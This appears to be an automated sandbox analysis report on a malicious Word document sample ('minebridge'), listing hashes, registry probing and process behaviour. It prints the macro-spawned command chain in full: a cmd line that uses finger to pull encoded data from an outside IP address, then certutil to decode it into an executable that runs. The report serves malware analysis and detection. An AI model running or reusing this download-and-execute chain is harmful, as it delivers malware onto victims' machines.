Analysis
-
max time kernel
136s -
max time network
137s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
16-01-2021 06:55
Static task
static1
Behavioral task
behavioral1
Sample
321b5dbbc36ac4946955905f9dd4f44b15df30cbfd7d2be1d8b6171c1ee71b67_minebridge.doc
Resource
win7v20201028
Behavioral task
behavioral2
Sample
321b5dbbc36ac4946955905f9dd4f44b15df30cbfd7d2be1d8b6171c1ee71b67_minebridge.doc
Resource
win10v20201028
General
-
Target
321b5dbbc36ac4946955905f9dd4f44b15df30cbfd7d2be1d8b6171c1ee71b67_minebridge.doc
-
Size
118KB
-
MD5
f95643710018c437754b8a11cc943348
-
SHA1
f590e1b6a80cf3e8360388382eabb04b3e247b78
-
SHA256
321b5dbbc36ac4946955905f9dd4f44b15df30cbfd7d2be1d8b6171c1ee71b67
-
SHA512
f39abfd51e62f145376b5587cd515072e01740e10e967f401057c00403017c6754264bed08f8bef819829a80762ce572b40463b7854db33a961ff2e624509fba
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4072 3460 cmd.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 644 WINWORD.EXE 644 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 11 IoCs
Processes:
WINWORD.EXEpid process 644 WINWORD.EXE 644 WINWORD.EXE 644 WINWORD.EXE 644 WINWORD.EXE 644 WINWORD.EXE 644 WINWORD.EXE 644 WINWORD.EXE 644 WINWORD.EXE 644 WINWORD.EXE 644 WINWORD.EXE 644 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.exedescription pid process target process PID 4072 wrote to memory of 3748 4072 cmd.exe finger.exe PID 4072 wrote to memory of 3748 4072 cmd.exe finger.exe PID 4072 wrote to memory of 2284 4072 cmd.exe certutil.exe PID 4072 wrote to memory of 2284 4072 cmd.exe certutil.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\321b5dbbc36ac4946955905f9dd4f44b15df30cbfd7d2be1d8b6171c1ee71b67_minebridge.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.execmd /C finger nc20@184.164.146.102 > %appdata%\vUCooUr >> %appdata%\vUCooUr1 && certutil -decode %appdata%\vUCooUr1 %appdata%\vUCooUr.exe &&cmd /C del %appdata%\vUCooUr1 && %appdata%\vUCooUr.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\finger.exefinger nc20@184.164.146.1022⤵
-
C:\Windows\system32\certutil.execertutil -decode C:\Users\Admin\AppData\Roaming\vUCooUr1 C:\Users\Admin\AppData\Roaming\vUCooUr.exe2⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\vUCooUr1MD5
4a172ad904d3b6d2d23104ba89db22e8
SHA1946884ab538d08aac9179005ac24df586d995a76
SHA256a2fca7801a8ec4b1e9472fc7cdf0d18e91b9f154b027405d6a7e544fb5890c8e
SHA51296e8f1934781adcbcac3ddf6490fae332535db5adcde793919530d9d6ea622291e1c806136c4f655e3c0115d9262bc1fc2ec6e5edaf8b0496c1e30128798c7ee
-
memory/644-2-0x000001EA94F20000-0x000001EA95557000-memory.dmpFilesize
6.2MB
-
memory/2284-4-0x0000000000000000-mapping.dmp
-
memory/3748-3-0x0000000000000000-mapping.dmp